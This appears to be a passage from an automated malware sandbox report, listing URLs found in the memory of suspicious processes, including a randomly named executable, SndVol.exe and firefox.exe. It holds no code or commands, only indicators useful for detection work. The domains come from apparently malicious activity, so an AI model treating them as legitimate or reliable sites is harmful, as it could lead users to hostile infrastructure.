                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.eventmagic.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.firstdial.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.firstmusic.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.genesisenergy.net/binding
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.globalreview.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.gstec.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.hackpack.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.haicaozhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.hedco.net/binding
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.jindouzhibo.net
                Source: firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.jutuzhibo.net
                Source: CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768386121.00000000027FD000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.kakupi.info
                Source: CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768386121.00000000027FD000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.kakupi.info/nezi/
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lamachine.net
                Source: firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lanyunzhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.legalvideos.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lemed.net
                Source: firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/15wz/
                Source: SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/css/appsdetail.6f4104a5611f3a6cc38f23add
                Source: SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/css/pcmodule.edd4638c5c3b3039832390269d4
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/js/adblock.fe363a40.js
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/js/aggregatedentry.fe363a40.js
                Source: firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/js/appsdetail.fe363a40.js
                Source: SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/js/bl.js
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/js/broadcast.js
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/js/common.fe363a40.js
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/js/footer.fe363a40.js
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/js/footerbar.fe363a40.js
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/js/header.fe363a40.js
                Source: SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/js/index.umd.js
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/js/js.js
                Source: SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/js/nc.js
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/js/pcmodule.fe363a40.js
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/js/pullup.js
                Source: SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/js/realNameAuth.js
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/js/replyItem.fe363a40.js
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/js/tracker.fe363a40.js
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/picture/anva-zilv.png
                Source: firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/picture/default_avatar.jpg
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/picture/qr-4_httpswww.wandoujia.comqr.pn
                Source: firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/picture/qr-5_httpswww.wandoujia.comqr.pn
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.linguarama.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.liuyuezhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mediaexpo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mexicolibre.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.miaozhaozhibo.com
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mibanzhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mierzhibo.com/binding
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mijianzhibo.net
                Source: firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.minglianzhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.moneysoft.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mozizhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.niuniuzhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.noscope.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nvdizhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.pasiones.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.pessoas.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.pharco.net/binding
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.qigezhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.qingtingzhibo.net
                Source: firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.qiyuezhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.qualityoffice.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.radiodrama.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.risna.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.sarfa.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.sencare.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.shalizhibo.net
